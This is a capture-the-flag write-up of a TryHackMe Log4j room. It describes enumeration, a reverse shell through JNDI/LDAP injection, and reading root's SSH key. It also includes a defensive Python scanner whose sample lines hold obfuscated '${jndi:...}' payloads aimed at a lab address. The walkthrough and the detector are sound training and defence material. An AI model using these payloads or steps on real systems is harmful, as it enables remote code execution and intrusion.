Lumberjack Turtle — TryHackMe
Hi folks, today I will be sharing the medium-rated TryHackMe room ‘Lumberjack Turtle’ created by SilverStr. As the description says, “No logs, no crime… so says the lumberjack.” This machine is Log4j based. Let’s start enumerating.
Initial Recon
Nmap Scan
We have SSH on port 22 and nagios-nsca on port 80. So far, nothing very useful. Let’s run a gobuster scan.
Browsing to the path it gives,
Nothing useful in the source code. Let’s run gobuster again on this path.
Browsing to the path it gives,
Sending the request through Burp and forwarding it to Repeater, we get:
There is a header X-THM-HINT which points to CVE-2021-44228 against the X-Api-Version header. This is the new Log4j vulnerability. The enumeration process is well explained in the “Solar, exploiting log4j” room on TryHackMe created by JohnHammond. There is also a blog on how this vulnerability can be enumerated; check this link for a good explanation.
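The defender’s side of that header is detection: the following Python scanner is an added example, not part of the original writeup or the room, that normalizes the nested-lookup tricks used to hide the “jndi” token and flags request lines carrying a JNDI lookup. The log lines and addresses are constructed for the demo.

```python
import re

# Inner lookups that resolve to a single character, e.g. ${lower:j}, ${upper:J},
# ${env:NOPE:-j}, ${::-j}. Innermost only (no nested braces inside).
_INNER = re.compile(r'\$\{(?:(?:lower|upper):([^{}$])|[^{}$]*:-([^{}$]))\}', re.I)
# A JNDI lookup with one of the protocol schemes Log4j can resolve.
_JNDI = re.compile(r'\$\{\s*jndi\s*:\s*(ldap|ldaps|rmi|dns|iiop|corba|nds|http)\s*:', re.I)

# Constructed sample request lines in a flattened "method path header: value" style.
SAMPLE_LINES = [
    'GET / HTTP/1.1 X-Api-Version: 2.15.0',
    'GET / HTTP/1.1 X-Api-Version: ${jndi:ldap://10.10.1.2:1389/a}',
    'GET / HTTP/1.1 User-Agent: ${${lower:j}ndi:rmi://10.10.1.2:1099/x}',
    'GET / HTTP/1.1 X-Api-Version: ${${env:NOPE:-j}ndi:dns://10.10.1.2/x}',
    'GET /index.html HTTP/1.1 User-Agent: Mozilla/5.0',
]


def normalize(value: str, max_rounds: int = 10) -> str:
    """Collapse single-character nested lookups until the string stops changing."""
    for _ in range(max_rounds):
        new = _INNER.sub(lambda m: (m.group(1) or m.group(2)).lower(), value)
        if new == value:
            break
        value = new
    return value


def find_jndi_lookups(lines):
    """Return (line_no, scheme, normalized_line) for every line with a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines, 1):
        norm = normalize(line)
        m = _JNDI.search(norm)
        if m:
            hits.append((i, m.group(1).lower(), norm))
    return hits


def scan_sample():
    """Run the detector over the constructed sample lines."""
    return find_jndi_lookups(SAMPLE_LINES)


if __name__ == '__main__':
    for line_no, scheme, norm in scan_sample():
        print(f'line {line_no}: jndi via {scheme}: {norm}')
```

Pointing this at real access logs or a header dump surfaces the obfuscated variants that a plain string match for “${jndi:” misses.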
Initial foothold — Exploitation
To exploit the flaw, several pieces need to be in place:
- setting up a server that will respond to the LDAP request (LDAP referral server)
- creating a reverse shell payload in Java
- serving the compiled class over an HTTP server
- setting up a netcat listener
- sending the malicious request.
LDAP Referral Server
Let’s create a Java file for the reverse shell.
Let’s compile it and host it with a local Python server.
Hosting the exploit with python3
Setting up the server
Listening on port 9999 with netcat
Everything is in place. Let’s run the malicious curl command.
Boom !!
Got the reverse shell. id says it’s root, but the shell is not interactive and would not stabilize with Python. Let’s search for the flags.
Got the first flag in the /opt dir. We can simply view the flag.
Root Enumeration
There is a dev dir containing disks. Let’s mount it and continue with local enumeration.
We have all the files of the disk. Let’s check the root dir.
No real flag. cd to the … dir. Let’s check this unusual dir.
We can view the id_rsa of the root user from the .ssh dir and get a fully interactive session. Though I already got the root flag, it’s up to you whether you want that. I am done here.
#pwned_By_Zexa